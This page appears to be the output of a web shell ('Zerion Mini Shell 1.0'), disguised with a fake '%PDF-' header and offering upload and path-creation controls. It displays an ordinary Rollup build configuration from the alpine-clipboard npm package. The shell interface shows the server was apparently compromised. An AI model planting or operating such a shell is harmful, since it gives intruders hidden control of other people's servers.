%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/loslex/test/node_modules/@ryangjchandler/alpine-clipboard/
Upload File :
Create Path :
Current File : /www/loslex/test/node_modules/@ryangjchandler/alpine-clipboard/rollup.config.js

import babel from 'rollup-plugin-babel'
import filesize from 'rollup-plugin-filesize'
import resolve from 'rollup-plugin-node-resolve'

export default {
    input: 'builds/cdn.js',
    output: [
        {
            name: 'AlpineClipboard',
            file: 'dist/alpine-clipboard.js',
            format: 'umd',
            sourcemap: true
        }
    ],
    plugins: [
        resolve(),
        filesize(),
        babel({
            babelrc: false,
            exclude: 'node_modules/**',
            presets: [
                [
                    '@babel/preset-env',
                    {
                        targets: {
                            node: 'current'
                        }
                    }
                ]
            ]
        })
    ]
}

Zerion Mini Shell 1.0